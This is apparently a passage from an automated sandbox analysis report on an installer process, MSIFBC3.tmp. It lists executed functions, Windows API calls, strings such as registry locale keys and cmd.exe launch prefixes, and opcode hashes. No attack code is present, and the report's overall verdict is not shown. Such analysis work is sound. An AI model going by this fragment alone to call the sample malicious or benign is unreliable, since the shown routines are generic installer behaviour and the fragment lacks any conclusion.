                                                                                    • API String ID: 1646373207-1127948838
                                                                                    • Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                    • Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
                                                                                    • Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
                                                                                    • Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Analysis Process: MSIFBC3.tmp PID: 6292 Parent PID: 4928 MSIFBC3.tmpCOMMON

                                                                                    Executed Functions

                                                                                    Function 005C6A5C, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6A9E
                                                                                    • GetVersion.KERNEL32(00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6ABB
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6AD5
                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C6C47,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6AF0
                                                                                    • FreeSid.ADVAPI32(00000000,005C6C4E,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C6C41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
                                                                                    • String ID: uk$CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 2691416632-2919004508
                                                                                    • Opcode ID: 930449ea2898bceb78295043c1ec9305660db60b0414eea0f5fbb8f5990fc05b
                                                                                    • Instruction ID: 9b09fa211300e1720079580cda0a6c70b4ecc7476fc6e1156ca500a6c4762d8e
                                                                                    • Opcode Fuzzy Hash: 930449ea2898bceb78295043c1ec9305660db60b0414eea0f5fbb8f5990fc05b
                                                                                    • Instruction Fuzzy Hash: EC515171A04309AEDB10EAE69D46FFE7BACFB08709F10446EF540E6182D678DE418765
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                                      • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                      • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                    • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                                    • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                    • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0062C764, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,0062C7FA,?,00000000,00000000,?,0062C810,?,0068D41B), ref: 0062C781
                                                                                    • CoCreateInstance.OLE32(006CC0C4,00000000,00000001,006CC0D4,00000000,00000000,0062C7FA,?,00000000,00000000,?,0062C810,?,0068D41B), ref: 0062C7A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 9826e4937534814f267a7b16ad82e7de6b6462802ce031e4cc7d27e7ee827f45
                                                                                    • Instruction ID: f353ce4d6a1a39ca338ca05349e2663bd9ced637506b69c883bbb80cf5210214
                                                                                    • Opcode Fuzzy Hash: 9826e4937534814f267a7b16ad82e7de6b6462802ce031e4cc7d27e7ee827f45
                                                                                    • Instruction Fuzzy Hash: F8112231688A04AFEB00EB66DC46F5E77EAEB04320F4204BAF005D7AA1D7B5AD008F14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060BC10, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0060BC73,?,?,?,00000000), ref: 0060BC4D
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,0060BC73,?,?,?,00000000), ref: 0060BC55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                    • String ID:
                                                                                    • API String ID: 873889042-0
                                                                                    • Opcode ID: b918b46556d871619cdd9246c2fbab89cac114e1fcc0c097a6a622e8dd6eb99f
                                                                                    • Instruction ID: 40d973860cf52e6d4e709199d75ee7f73fef1ce7e5283feda8d773f7ac4b311a
                                                                                    • Opcode Fuzzy Hash: b918b46556d871619cdd9246c2fbab89cac114e1fcc0c097a6a622e8dd6eb99f
                                                                                    • Instruction Fuzzy Hash: 09F0F931A84608ABDB14DF799C4149EB7ADDB8672075186BBF814D32D1DB754E018298
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                    • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                                    • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                    • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                                    • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                    • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                                    • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                    • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AAC44, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7E4,00008000,00000000,?,00000000,006AAF8E,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6), ref: 006AAE3C
                                                                                    • CoTaskMemFree.OLE32(?,006AAE7F,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE72
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7F4,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE8F
                                                                                    • CoTaskMemFree.OLE32(?,006AAED2,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    • Opcode ID: 696bb485f508fd4fc235287d8c56ccdf96c541909d852cd50d0c8d5b81ec93a6
                                                                                    • Instruction ID: fe51c0427e94c168f709ef2f052c82e6a7ec7b866c045d3231fd400451090af3
                                                                                    • Opcode Fuzzy Hash: 696bb485f508fd4fc235287d8c56ccdf96c541909d852cd50d0c8d5b81ec93a6
                                                                                    • Instruction Fuzzy Hash: 36819270A016089FDB15FFD4E841BAE7BA3EB4A300F90556BF401A6B91D7389D01CF66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID: PLl$pLl
                                                                                    • API String ID: 3997070919-4186446801
                                                                                    • Opcode ID: 680169fcd532cac4d69c46f1a411d0c4da8965a060f4a2cecfd24daada8743fe
                                                                                    • Instruction ID: 89124adebdcc93ff81c3ba781c85106882e461d72a0ecd66a84e58e39c90ae7a
                                                                                    • Opcode Fuzzy Hash: 680169fcd532cac4d69c46f1a411d0c4da8965a060f4a2cecfd24daada8743fe
                                                                                    • Instruction Fuzzy Hash: 1EA17F75A01309AFDB24CFD5D981BEEBBB6AB48310F14451AE505AB390DBB4E9C0CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060E9CC, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 157COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060EBFC,0060EBFC,?,0060EBFC,00000000), ref: 0060EB81
                                                                                    • CloseHandle.KERNEL32(006B66D7,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060EBFC,0060EBFC,?,0060EBFC), ref: 0060EB8E
                                                                                      • Part of subcall function 0060E938: WaitForInputIdle.USER32 ref: 0060E964
                                                                                      • Part of subcall function 0060E938: MsgWaitForMultipleObjects.USER32 ref: 0060E986
                                                                                      • Part of subcall function 0060E938: GetExitCodeProcess.KERNEL32 ref: 0060E997
                                                                                      • Part of subcall function 0060E938: CloseHandle.KERNEL32(00000001,0060E9C4,0060E9BD,?,?,?,00000001,?,?,0060ED66,?,00000000,0060ED7C,?,?,?), ref: 0060E9B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                    • API String ID: 854858120-615399546
                                                                                    • Opcode ID: cb05d133c30b01032d10f250bae43d5c6107cd6e2c5dceb6072361d6968af2d2
                                                                                    • Instruction ID: 07a5d6622b0d651e74d63e867ec204be8bf58b8f6432d8305f3226309c39c408
                                                                                    • Opcode Fuzzy Hash: cb05d133c30b01032d10f250bae43d5c6107cd6e2c5dceb6072361d6968af2d2
                                                                                    • Instruction Fuzzy Hash: 95514F34A8031DAADB04EFE5C982ADEBBB6FF44304F60447AF805A72C1D7769A05CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32 ref: 005B8604
                                                                                    • IsWindowUnicode.USER32 ref: 005B8618
                                                                                    • PeekMessageW.USER32 ref: 005B863B
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                                    • TranslateMessage.USER32 ref: 005B86D6
                                                                                    • DispatchMessageW.USER32 ref: 005B86E3
                                                                                    • DispatchMessageA.USER32 ref: 005B86EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2190272339-0
                                                                                    • Opcode ID: be14539378901f34a9f73cd4942952708fe83c9efa75b6763ce22da6b5766406
                                                                                    • Instruction ID: 7850c8a41d1bda1102247ae3eba297ae2e53e2ccedf434ab9455d22e2f6bc662
                                                                                    • Opcode Fuzzy Hash: be14539378901f34a9f73cd4942952708fe83c9efa75b6763ce22da6b5766406
                                                                                    • Instruction Fuzzy Hash: F621F83034478065EA312D2A1C16BFE9F8D6FF1B48F14545EF58197182CEA9F846C21E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AB2D4, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006AB42A,?,?,00000005,00000000,00000000,?,006B7B71,00000000,006B7D26,?,00000000,006B7D8A), ref: 006AB35F
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006AB42A,?,?,00000005,00000000,00000000,?,006B7B71,00000000,006B7D26,?,00000000,006B7D8A), ref: 006AB368
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
